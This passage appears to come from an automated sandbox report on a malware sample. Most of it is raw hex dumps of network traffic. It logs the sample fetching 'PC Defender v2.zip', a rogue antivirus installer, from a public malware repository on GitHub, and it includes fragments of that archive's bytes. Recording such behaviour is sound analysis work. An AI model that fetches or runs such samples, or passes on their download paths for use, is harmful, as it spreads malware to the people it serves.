                                                                                                                                                            2022-09-29 12:45:18 UTC27659INData Raw: 92 f2 7a 35 c9 19 bd cd 2b be 79 58 ac ba 6e cf f4 1b d6 a2 b7 22 76 a2 ca 20 63 3e aa aa 59 16 8b cf 7b 6b e8 b8 9f a4 d0 a9 6d 71 89 3c fb 98 e2 59 b4 50 6c 37 b0 e0 99 a4 34 ff f6 a2 e7 ff 82 8e 0b 40 5e 47 c8 6b 92 64 86 b1 2e 6a f6 23 0b 0e aa 7e 8d b3 71 f8 52 59 b5 09 0d 1e be 8f e8 41 31 7d f5 d3 44 63 23 59 76 bf ec f3 cd df 04 5d 3f 04 b8 e8 29 cb 97 8d 3d 8f a7 85 5d 55 eb cc 59 49 c7 8b a0 7b c1 33 30 c3 c7 79 76 d9 cd 72 30 14 7d fe e0 09 3f db 03 11 fb f0 3d b7 5b ef 61 28 6f ef aa 2b 71 49 fc 6d 44 4d 15 6d 1a 4d 73 9b f5 a3 3d 06 3a df fe b8 52 a8 a5 27 f5 57 3d 9e 4b 91 8d 02 dd af e0 15 8b 46 54 1f d8 fe aa 76 37 51 67 da 83 c2 8f 18 39 39 3b f8 ba ce 32 ca 46 34 60 04 c9 80 7d 15 56 97 25 f3 e5 53 a9 b2 47 23 07 74 b8 c3 e2 52 e7 34 e2
                                                                                                                                                            Data Ascii: z5+yXn"v c>Y{kmq<YPl74@^Gkd.j#~qRYA1}Dc#Yv]?)=]UYI{30yvr0}?=[a(o+qImDMmMs=:R'W=KFTv7Qg99;2F4`}V%SG#tR4
                                                                                                                                                            2022-09-29 12:45:18 UTC27675INData Raw: 6a ee 17 89 90 3a 68 90 47 af 3a b5 27 07 0c 2a 67 27 6d 6c 9d 04 e4 8c 00 a2 e1 89 9f 0d 97 94 56 7c 3f a5 f8 e0 03 24 dc 7f 9a fc c8 b0 6b 6a 8c 96 bf 82 1a ab f0 2a 0b 8d 75 60 0c f7 7e 5c 4c 72 92 01 bc c3 60 27 07 c1 7a 85 e1 eb 9c cb 1c 0b a4 d6 37 70 f9 d0 f5 db e7 81 ef e9 50 93 0a 81 3a 84 47 ec d1 25 5f e7 2e 36 a8 1c e3 3a 9d 6f 2e 57 ca 92 bc 2f ea 11 bf 70 83 6d cf d8 f5 d1 15 af 73 e4 fb 9e aa d8 c3 35 8a c2 9b 39 00 f7 d3 9e 9f 73 cb 3a 2d 39 8d 88 20 7c 6d 5b a9 09 e8 c5 97 f5 68 3e 18 90 1f e2 e5 2a f3 4b 73 73 ba 5d ae 8d 70 7c a1 29 b0 b2 ba af 4b 0f b2 9c 97 ad 09 f6 78 2a e3 8c ce 6a 6e c0 56 b8 3b ec 7f 9f 5d 22 9b af ac 5b c0 5d 11 32 25 5b 14 45 36 27 c5 c4 26 5e 2a 4d 77 35 c0 51 5f 93 cb 82 ba 1a 47 02 8f 3c 17 a2 3a 33 f7 ec 5d
                                                                                                                                                            Data Ascii: j:hG:'*g'mlV|?$kj*u`~\Lr`'z7pP:G%_.6:o.W/pms59s:-9 |m[h>*Kss]p|)Kx*jnV;]"[]2%[E6'&^*Mw5Q_G<:3]
                                                                                                                                                            2022-09-29 12:45:18 UTC27691INData Raw: 56 2e 9a 5a bb 6a d4 1f 4f 07 62 30 1b 57 67 70 f3 68 11 87 0a d2 03 26 24 48 0a 20 59 30 70 94 d9 d9 9a c3 a9 8c 62 6b 0e 5a 0f 03 83 dd 81 2c 63 4a d8 26 9f 30 30 c5 e4 dd bb d8 85 bb e8 e8 03 e4 46 c2 82 27 b7 17 1c 55 0d 4b aa 79 ce 83 5a ea 63 f7 bb 01 11 04 5d d4 db f7 a4 ab ef 6a a0 e8 40 36 16 00 28 90 0b 38 ff fe ea af 82 d5 58 b4 72 e0 71 dd 76 ec 8b da bd d3 be c9 3c 2a b2 1d 9c 07 2d bb 76 8c bc 0e 0a 89 e9 96 be 1f 39 11 3e 1c 26 50 54 80 3d bb 85 28 7a 90 d6 f3 27 16 09 63 37 b1 3f 95 78 63 c3 9a e8 bc 66 48 86 b6 ca 1f d8 04 64 99 71 31 c8 cf d9 28 64 4e bf f1 aa 92 0c 6c 8c da b8 ba 68 16 48 b4 e8 8e 59 be ef 54 a6 0b 95 20 9f f2 f3 88 d9 8a 93 e6 89 44 a8 49 58 df eb 3b cb de d2 3b dc 94 e8 1c f2 df e9 5a d5 3d 1b 1a bb aa a3 50 10 a6 26
                                                                                                                                                            Data Ascii: V.ZjOb0Wgph&$H Y0pbkZ,cJ&00F'UKyZc]j@6(8Xrqv<*-v9>&PT=(z'c7?xcfHdq1(dNlhHYT DIX;;Z=P&
                                                                                                                                                            2022-09-29 12:45:18 UTC27707INData Raw: c8 28 89 f2 5f ec d5 2a e7 30 92 08 80 67 d5 ee ae ce 0c 3a 93 39 97 65 fc e1 67 c0 bf e5 c6 eb ff 1d 9b fa 2a 19 f8 30 73 69 e8 60 b2 80 bc 07 13 d8 61 d8 80 c9 e5 8f ea 62 fe 41 8a 7b 8d 58 97 ad a0 c6 9d 0f de 17 ca ce 5b de b3 c7 fc 56 2e df 9e 80 39 8e 1f 50 13 15 87 33 94 2a 81 8f 25 c8 f9 80 8b a7 3b 40 cf e5 f8 75 88 cc 35 2b 3b 03 73 60 64 60 61 fd f7 67 52 1c 0c c9 19 ea 3a 96 e2 a1 b0 6c df b2 0b d5 5a 4d 7b 6a 9e cc 69 ef 23 5f 0e 1b cf cb 8b 02 e9 dd c3 62 fc 83 60 16 ed 86 67 c1 6a 1f 06 8b 75 eb 63 60 91 27 ca 61 ab 42 e6 83 b1 17 48 e4 1b f2 a4 cc 91 67 b6 06 ed c6 28 8f d6 02 78 c3 d6 56 5d 88 b0 36 11 82 46 c8 4c f4 d0 96 b5 cd 38 4e 7e be 77 2d 1a 2c b3 63 21 f1 8a d3 c0 6c 32 8e 71 f9 cf d1 db 34 1a bf d7 29 df 43 60 d1 45 2b 11 eb 04
                                                                                                                                                            Data Ascii: (_*0g:9eg*0si`abA{X[V.9P3*%;@u5+;s`d`agR:lZM{ji#_b`gjuc`'aBHg(xV]6FL8N~w-,c!l2q4)C`E+
                                                                                                                                                            2022-09-29 12:45:18 UTC27723INData Raw: 56 56 a5 b0 07 89 7e d0 3d aa d4 d1 54 11 9d ab 71 65 82 7e d3 cc 57 13 39 07 1e 66 f9 1a 0d d9 fa fe 50 c2 66 b9 23 75 d3 87 d9 40 a3 a6 e5 c2 cd f4 0a 22 12 75 30 9b 56 ad 97 e6 6d 88 36 8f cf 8e 01 b5 95 60 b2 2b 1d 00 bf 65 31 d9 16 f9 0f c4 96 09 34 93 2d 70 43 3f 7c 88 94 c4 47 0e 3b d0 27 b4 fe 05 1b cf 6e f8 ef 8a 2e e9 15 4b 8f 6d fb 78 4c 20 28 5a 90 cb 84 1d fd c5 82 7a 68 3d 27 7f b9 5b 17 50 24 0f 5d 73 49 48 36 e4 e8 2c 1b d3 a9 2a 20 c5 0d f0 98 5f ea e3 15 cc 5b ab 22 65 73 15 f4 0f 6e 90 b7 08 40 5f e7 0b 80 5b 56 99 2e d9 d5 38 d2 08 1f 3f 51 b1 88 f9 e4 14 c8 35 fa 52 dc 85 f3 f5 5e 45 ea 9c 57 ea 15 3b ba ae 29 d7 29 dc f4 c9 1f 33 87 ff 6f 00 3b ac 12 64 18 bd a1 ff cf 5b 38 e6 ab ac 68 5a f5 8d c6 4a 39 aa 1e 59 56 0e 90 d4 92 a6 8b
                                                                                                                                                            Data Ascii: VV~=Tqe~W9fPf#u@"u0Vm6`+e14-pC?|G;'n.KmxL (Zzh='[P$]sIH6,* _["esn@_[V.8?Q5R^EW;))3o;d[8hZJ9YV
                                                                                                                                                            2022-09-29 12:45:18 UTC27739INData Raw: cc 58 81 a4 50 89 46 74 1c ad 5d 17 d8 b6 bd b3 c7 4c 8f a9 7a bf b0 3d 40 bb 87 b9 90 cb aa 5b 6e 1d 83 66 c2 77 c5 1e 44 88 1d 60 bd e2 1f 7f 74 23 21 fa 3b 3d f5 c1 d0 4f 1f 4b 4d 6a a7 a1 e7 0a a3 42 9c 05 e5 ab 92 84 a8 c1 69 4a 1c e4 36 66 4b a4 b7 3b 13 de 57 c4 0c 4e 76 d6 d7 09 8c 20 8b f2 e6 c1 72 45 eb 66 d2 6c 32 d9 9e 9b d4 f2 6a 36 c4 93 a5 80 38 1a 3f 54 b7 ce d6 a9 4e 32 f5 47 84 0d 6c dc 94 5b 02 c5 36 4a 49 78 ac dc 41 ff f8 fd ba fc 89 84 3e 05 0f bd c8 01 af 26 e1 ae 58 16 17 e2 4b 07 5d aa b2 ec 29 3d 55 b7 c1 68 6b e5 a6 de 27 90 76 e3 17 d9 a9 10 5b 69 e5 d6 cd 34 6d 36 dc 7d ce cc 97 8f c6 02 26 52 57 8a c0 53 b7 7b b9 39 76 91 7e 75 d8 ef ba ed 95 93 ee 49 84 84 53 ef d7 83 40 34 ee b3 9a 3d db 87 29 ae 1c 50 79 f4 02 e3 f6 ec ff
                                                                                                                                                            Data Ascii: XPFt]Lz=@[nfwD`t#!;=OKMjBiJ6fK;WNv rEfl2j68?TN2Gl[6JIxA>&XK])=Uhk'v[i4m6}&RWS{9v~uIS@4=)Py
                                                                                                                                                            2022-09-29 12:45:18 UTC27755INData Raw: 45 ed 0a 14 f5 3b c8 8b 2a a4 55 79 40 9f a9 80 2b 98 2b a4 92 fd 87 8b 69 ac 7f 97 17 44 83 4d 01 bc e5 40 b5 8b f6 e8 fa 6e 94 da 06 21 99 10 f8 02 5f 23 af 10 e1 06 56 48 89 76 da 99 ea b3 1c 7a 77 a5 6d f4 b5 84 a3 08 ce d2 f7 93 b1 d2 ec 32 9c 61 35 25 22 83 1d bb a5 fd 17 94 d8 e4 11 a5 e9 70 b5 bf 00 3e 17 c5 c0 47 aa 4b ce fb 49 0a af d5 5f cc e8 9b b4 86 f5 fe 57 46 d5 5b 4e 1d ef 2a c7 97 27 67 45 74 6e 3d ce 5c a2 ec 6b 5c 57 64 71 1d fb d0 c3 3e 36 87 33 4b 42 5a 2d 58 af 36 c1 5c a8 5f f5 f0 17 55 df 7a 15 63 ea 64 f2 da d3 5e df a3 32 cd df 8e 97 c4 48 7e c9 8d 9c 99 5f df 6a fd 30 43 4a b5 14 c6 a1 8c b9 0b 91 ea ac 65 ec 74 75 14 55 69 c6 ad 49 bd 26 d6 1b 8b 2d 16 82 7f 51 3c 6b e6 e7 9f e0 44 eb d3 71 cc bf 66 ae 30 b5 88 0c 3c 7d 97 04
                                                                                                                                                            Data Ascii: E;*Uy@++iDM@n!_#VHvzwm2a5%"p>GKI_WF[N*'gEtn=\k\Wdq>63KBZ-X6\_Uzcd^2H~_j0CJetuUiI&-Q<kDqf0<}
                                                                                                                                                            2022-09-29 12:45:18 UTC27771INData Raw: e9 7c ab 9c 77 e8 30 ec 95 65 c0 90 bc 46 ea 54 7c 9d f8 3a b3 dd 02 f2 3c 91 50 1a a8 24 32 37 85 d2 5a 7e 29 d3 c9 13 b6 48 eb 85 34 b7 08 cd 3d 94 43 70 98 dc a0 3d 21 ed 23 8d 58 be de 6b a6 98 5f c9 f4 70 43 b5 a6 c0 40 e9 cf c6 93 a0 4d 58 6a 74 e0 01 b9 60 3c 50 db 87 9f 49 f4 af 8f 77 25 28 ef cc b6 59 08 ff 18 a7 5b 79 09 6a 8e 50 a9 51 2b d6 9c 38 32 f4 af 5e 7b 38 14 bb 85 39 b1 30 2f 69 35 bd 20 16 1f ec 5f 57 03 81 06 82 19 eb f6 c3 54 ff ef b7 a1 87 dd 8f 8f 31 b7 fa d5 1a 8a 3f 36 b8 66 57 36 48 68 e0 55 ff b4 0a 0a fc 1a 56 b3 ea 11 fe 7a 54 e7 d4 14 22 3a b9 54 a5 dd e5 f6 71 03 a8 19 e8 4d 49 f0 8d b9 cc fa 49 c8 5b 5d 33 88 dd 81 c0 eb ba 0e 23 c1 70 ec 11 ee 24 eb f5 33 7d 00 01 c2 d5 7a 2a cb 92 6f 18 9a a2 1b e4 9e f9 d0 36 92 29 c5
                                                                                                                                                            Data Ascii: |w0eFT|:<P$27Z~)H4=Cp=!#Xk_pC@MXjt`<PIw%(Y[yjPQ+82^{890/i5 _WT1?6fW6HhUVzT":TqMII[]3#p$3}z*o6)
                                                                                                                                                            2022-09-29 12:45:18 UTC27787INData Raw: b8 74 3b e8 06 76 7b 1d 9f 76 48 5d b8 fa 0d 0c a6 56 4f 6e 0e 2a e3 48 a0 7a 26 9d 5d ef 1e b3 98 d7 82 80 31 3c 99 65 f5 be 83 1d 20 ff c6 38 08 72 42 41 4d 60 e3 99 a4 68 af aa 64 7c 62 3a 53 48 5e e9 33 c3 52 c0 3f f1 0c 7d 2a 0e 89 74 ee 8b 9b c6 1c 95 5a 89 64 f8 20 37 fa d9 fc d9 b9 41 a7 76 13 f2 31 6e 1c 62 de 03 b1 27 75 4b a0 9a f9 e7 0f 4a 7e 9c 33 20 f1 ad fe 33 4a 51 d3 3e 66 e7 6c 05 b0 2d c7 f3 40 b3 2b 5c 01 aa 7e b7 2c 88 6c 9d 82 50 70 89 cb 85 05 e3 69 56 6f 79 6b 2d 04 6e 89 8f 68 8f dd 81 97 22 59 29 a0 28 8b 1a d1 f7 84 42 33 f1 94 0b e3 67 f3 fe 56 1e ce ff 8b 97 78 71 c5 68 ab e0 35 30 56 7d b7 0a dc f2 d6 62 da 66 49 0e 1c 98 de ab ea f5 e1 c6 dd 99 e9 68 60 e2 40 5f 5b 9e 20 4f ed 1d 0e 4a 30 87 d5 f0 4e 03 56 f3 11 8e aa 44 dd
                                                                                                                                                            Data Ascii: t;v{vH]VOn*Hz&]1<e 8rBAM`hd|b:SH^3R?}*tZd 7Av1nb'uKJ~3 3JQ>fl-@+\~,lPpiVoyk-nh"Y)(B3gVxqh50V}bfIh`@_[ OJ0NVD


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            102192.168.2.649759140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:19 UTC27793OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            103140.82.121.4443192.168.2.649759C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:19 UTC27793INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:00 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:19 UTC27794INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            104192.168.2.649760185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:19 UTC27795OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            105185.199.110.133443192.168.2.649760C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:19 UTC27796INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 808324
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "90d2402923439bff69b4e2e4b61840f4f4c22bfbc0155d3f83cead22bcfa0c94"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 080D:3F36:6EE7E0:7C68D4:6335935F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:19 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6942-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455519.403239,VS0,VE153
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 03e9edd99426fd07f3c82dcd00e6264b7d2cc6d8
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:19 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:19 UTC27796INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 80 27 3d a2 81 68 5d c8 54 0c 00 00 72 0d 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 76 32 2e 6d 73 69 71 b1 84 80 41 51 cc d0 29 e8 26 1a a1 f7 36 a5 a0 21 85 13 da c5 46 48 db f2 9f d7 a0 76 93 0a 9c a8 f0 6f bc b6 86 4d 3a d3 a1 ea c3 86 e8 02 f6 47 b1 64 3e 6f 27 f0 a9 af 57 e0 69 a0 cc 64 0e eb ff f2 c3 75 e0 5c f8 07 90 9f 7b 02 41 1c a6 8e 14 07 db 43 99 c8 6a e6 f5 37 b2 d4 53 3a ee c8 02 50 2e c7 27 fa 7f 2b 27 9c 20 85 35 b7 9a d3 49 be 57 e1 5b 00 c0 16 6d 5f 4f b3 9c a2 d3 3d 31 2a bd c1 5a c8 e1 b9 53 61 b5 e1 41 a0 17 fa a0 fc 4b cc 34 cf 11 9a 15 ea 82 d1 10 6b 5b 47 ca fb 79 eb 19 68 6f 77 dc 0a 6e a9 85 14 07 44 d9 78 4e d9 d5 ed ce 2e 9c 4c 72 33 55 32 bd 47 8c 1e 6b 36
                                                                                                                                                            Data Ascii: PK'=h]TrEndermanch@PCDefenderv2.msiqAQ)&6!FHvoM:Gd>o'Widu\{ACj7S:P.'+' 5IW[m_O=1*ZSaAK4k[GyhownDxN.Lr3U2Gk6
                                                                                                                                                            2022-09-29 12:45:19 UTC27812INData Raw: df 05 2a 4b 12 6a 18 f2 bd 4a 3e ac 0d be b5 9a 55 00 91 a2 df a8 77 5e e2 bc 2f c2 cd 95 d5 0d b6 d9 c1 0b d0 2e 76 94 c7 28 01 ad 70 fb 8d 65 b0 b5 f7 08 d0 7b fa 3e bd c1 67 46 1f cc 27 c0 f6 5c 41 1b 5b 5b 30 88 2c 52 00 60 fe d3 a3 e9 70 94 c2 70 70 b7 81 69 15 f8 68 e6 fa 59 1b ba 25 7f 11 c7 76 4f 5f 69 06 b8 41 46 3c d0 d2 51 d6 fa 6a c2 80 71 76 da 62 73 2a 59 31 dc 26 32 06 42 f7 b3 ef 99 6e 3e ad 4b 93 f4 ae fb 83 86 69 fd 11 b2 ca eb 2e b5 0b d9 78 f1 37 1f e6 76 1e b9 59 cd 68 83 bf 66 ba 0a aa 45 ed 2d 98 0b 7f a4 23 de b8 df 64 31 05 c3 bc 4b dc 70 12 7c e4 6b 23 22 bd 12 f6 35 c7 33 8d 09 eb b5 cb 7d 72 ca ac 93 8e e1 22 1a 6c f4 0b 16 06 94 1c 84 ae 19 fa eb 16 98 7b 2f 02 79 49 86 b0 4b c6 04 98 23 e6 08 49 2a a2 b9 87 b1 e6 f4 9d 6f 9d
                                                                                                                                                            Data Ascii: *KjJ>Uw^/.v(pe{>gF'\A[[0,R`pppihY%vO_iAF<Qjqvbs*Y1&2Bn>Ki.x7vYhfE-#d1Kp|k#"53}r"l{/yIK#I*o
                                                                                                                                                            2022-09-29 12:45:19 UTC27828INData Raw: 91 b4 1b e1 be c8 75 a4 3f d9 eb cd b6 54 1f cb dd 66 ea 92 91 16 87 cf 9a 03 19 08 a0 d2 48 9c 06 78 71 67 3f 9c d2 2c a2 62 fa 06 cc ff a6 39 1f d2 6d df 11 ea c2 05 6c 36 89 f2 73 6b 00 4a a9 5a 2a b3 e5 28 4d c7 d5 60 e8 e3 14 fe 08 e6 d9 20 3f be 3e cd 5a 1c 77 23 1c dc 7a b7 44 78 57 c8 76 2d 5a 34 26 fb 41 33 76 e3 3b 48 14 35 e7 ac 13 39 ad 38 79 31 80 85 63 b3 ac 4a 38 57 bc c8 fb 72 8e 11 d5 65 11 31 80 28 3e 39 1a 2d 63 aa 2b 78 2e 46 ba 07 e5 61 93 66 87 0c 85 80 e2 ca b1 b2 12 9e fc 03 3e c7 a9 43 c0 f6 6f c6 37 77 66 41 43 3b ba 72 ba b2 84 d0 1c a4 23 2e 80 a5 ce 27 d6 61 22 49 25 b0 e6 94 9c e7 c5 83 d9 36 d1 51 3a 08 ad 4a fe 50 8f e5 d9 2d 19 fe d5 41 a2 31 96 76 e6 b5 1f e3 91 83 cf ea 03 0f 0e 46 90 c0 3a ce c3 7c 4a 48 fc 62 6f f0 f3
                                                                                                                                                            Data Ascii: u?TfHxqg?,b9ml6skJZ*(M` ?>Zw#zDxWv-Z4&A3v;H598y1cJ8Wre1(>9-c+x.Faf>Co7wfAC;r#.'a"I%6Q:JP-A1vF:|JHbo
                                                                                                                                                            2022-09-29 12:45:19 UTC27844INData Raw: 3a 8b fc 30 69 96 74 d8 1a 32 d9 40 08 ca 6a 7a f3 2c f6 c9 a8 4b 6d 98 cf 6c 8c ba e4 6f d0 d3 39 34 68 51 36 58 aa 31 ff a2 e1 fd 9f f6 63 d4 ae 71 a5 a1 40 5a c9 9a bb 8e f9 a5 c5 91 79 5d 49 e0 7a c5 16 af 92 40 b3 af ef 1e 70 42 b2 07 6f 24 d1 d7 22 25 0e ce 20 64 62 1e 61 c9 ea 81 af 17 6a bf a0 74 fb b3 32 fc e2 27 20 a0 a7 51 77 f3 ed ed f7 42 01 a8 69 6a 3a b6 67 1c e7 67 48 bb b0 e6 4b f3 ff da de 8b aa 68 b8 e6 52 9e 66 7e 16 45 74 b2 25 12 3b bc ee f0 a4 d3 74 b2 24 5b 37 c7 9e 74 3f 7c aa 5f de 7d a6 08 88 e7 d4 5e 6c 16 4e c0 35 55 72 6b 9f ae c2 13 2c b0 fd 4a 91 60 07 f4 c1 03 7e 06 47 70 eb b4 17 d9 13 c9 c8 3a d4 06 60 1d 81 f4 67 08 c6 5d 5e 11 6d a1 2f f0 e1 2a 8e 3b 92 63 d5 ab 13 d8 74 2e 4f e1 11 ff 6a fc e8 bc cc 1f 47 3c 27 db 67
                                                                                                                                                            Data Ascii: :0it2@jz,Kmlo94hQ6X1cq@Zy]Iz@pBo$"% dbajt2' QwBij:ggHKhRf~Et%;t$[7t?|_}^lN5Urk,J`~Gp:`g]^m/*;ct.OjG<'g
                                                                                                                                                            2022-09-29 12:45:19 UTC27860INData Raw: 73 82 0a 3e ee 36 52 44 e6 fd 9f 31 01 e7 80 e1 8a 74 9c 89 9c 19 44 8d c3 ba 8b 51 a5 fe ee 49 13 b3 c2 70 03 8b 69 2e a3 1b 96 b8 58 06 31 e0 0a fc 01 e6 3e af 74 ca 94 20 fb ef 5d 27 4f da 38 10 13 12 b9 e2 23 b6 ab 06 42 e8 b6 40 ba 2a 39 74 0b b4 ff d6 bb 5a 94 80 6f 44 18 7a ad 02 28 7a f7 4c eb b8 d5 84 42 cc 1a 4a 0c 02 81 b9 90 57 27 d6 01 ab ad 0b 9a 5e b6 41 70 f7 20 85 3c 0a 9c ee 28 78 66 47 20 d8 29 93 09 37 85 6f 31 51 45 ab 11 fd 63 9f 34 25 dc 71 c4 4c 06 e4 fd 52 7a 76 95 3a d5 38 a3 90 83 a3 94 81 a5 b8 51 d5 02 58 16 4e af d8 77 c9 32 4f 16 ac ff 9d f5 fd 30 b1 9e 8c 37 5f 39 1e 31 ee d9 2c 9c 4c c0 75 7c 1a 74 c7 dc 1c db e3 23 f9 7c db f8 47 c1 12 26 5c 2d ed 09 68 09 ad 20 54 f5 4e 7d 69 a1 c8 3b 5b e2 74 38 8d 71 3f a1 e8 4b 1f f1
                                                                                                                                                            Data Ascii: s>6RD1tDQIpi.X1>t ]'O8#B@*9tZoDz(zLBJW'^Ap <(xfG )7o1QEc4%qLRzv:8QXNw2O07_91,Lu|t#|G&\-h TN}i;[t8q?K
                                                                                                                                                            2022-09-29 12:45:19 UTC27876INData Raw: 32 de 7b 79 46 63 e8 56 fb f2 60 1f 8d 70 0f 04 f8 11 1f 92 d7 a5 3d b3 06 9c 12 75 78 ef ca c7 03 bd 06 34 be 6e e2 ef 15 e0 df d9 f1 78 3c a5 f7 5a 11 b7 cc ff 2d 2a d4 a7 c9 26 e3 73 00 8e 76 a4 ea 2a 4c b6 3d dc 05 41 23 e4 21 86 e0 23 4f 66 82 fc f6 6c 18 78 3c f2 14 5a f1 a9 d9 8f 40 dc ed 12 52 40 16 c5 0a 82 10 53 5b 09 9f 02 2c 9f f5 1f 17 b5 94 19 a7 f0 0a d0 c3 60 90 40 72 f6 34 e9 a1 48 7a 38 04 f4 69 e6 f9 e4 dd f9 a1 1e ef 22 95 ba d2 1a 85 8f 2e 3c d9 77 5a 2e 14 4e 97 e7 cd 75 15 e2 bb 8a cb 8a 0d b9 f3 00 c8 3b 93 d6 86 d0 8f ee 7d 3d a9 ec cb c1 87 85 77 fd 4c 85 dd b8 90 d5 ca 58 cf f3 ac 94 1c a4 f2 76 31 cf 78 9f ff 03 a0 73 14 3c 6c 2e 0d 60 e5 e8 f1 43 93 c6 db 3e 94 3c 51 2a d3 46 9c 22 d4 da 79 96 ae 35 4e 44 d0 dd e6 d5 5b 73 81
                                                                                                                                                            Data Ascii: 2{yFcV`p=ux4nx<Z-*&sv*L=A#!#Oflx<Z@R@S[,`@r4Hz8i".<wZ.Nu;}=wLXv1xs<l.`C><Q*F"y5ND[s
                                                                                                                                                            2022-09-29 12:45:19 UTC27892INData Raw: fa 1a ba 46 29 00 c2 61 c6 5b f2 9d d7 9c 37 eb 55 21 6f 0b 94 e2 fc 8c 28 6d d1 23 70 ff 68 1a f7 f2 a2 9d bd 4a 38 2f 5f 12 75 74 52 c8 09 d4 fc 42 65 d8 84 a1 e6 79 b7 ed 09 1a a5 ab c3 86 28 9d fb 82 6d c0 79 d9 0e 03 64 51 43 1d b8 97 89 74 54 2a 02 ef 59 d1 43 b4 46 ac 39 4a 79 dd fe 70 60 cd f5 17 e7 f3 8d 75 3a 37 83 5f 10 7a a0 85 b5 61 31 9c 5f ae b3 48 8d 40 37 4b ef a5 ae ee bb 78 9c 99 cb 19 e1 58 cb 2a 13 7b c8 e9 3e c8 3d b0 8d d0 8a bf 9b c7 5c 08 1a 72 42 70 03 f2 c0 6f e6 55 03 2e 8e 29 84 09 cb 01 5f cd 70 52 f9 3c 8d 0a 72 27 69 85 3f a4 fe 26 fc 66 f3 2d 2e 74 91 9f 06 b6 41 4c 17 43 ba 2a fc a7 17 92 52 59 16 a2 ab 17 8c 67 d4 40 ee eb 5e 61 31 0b 0c 1f c6 de e0 a6 ea ad 69 94 78 f1 40 19 2c 60 98 aa f5 71 77 12 43 68 0e 64 ff f7 73
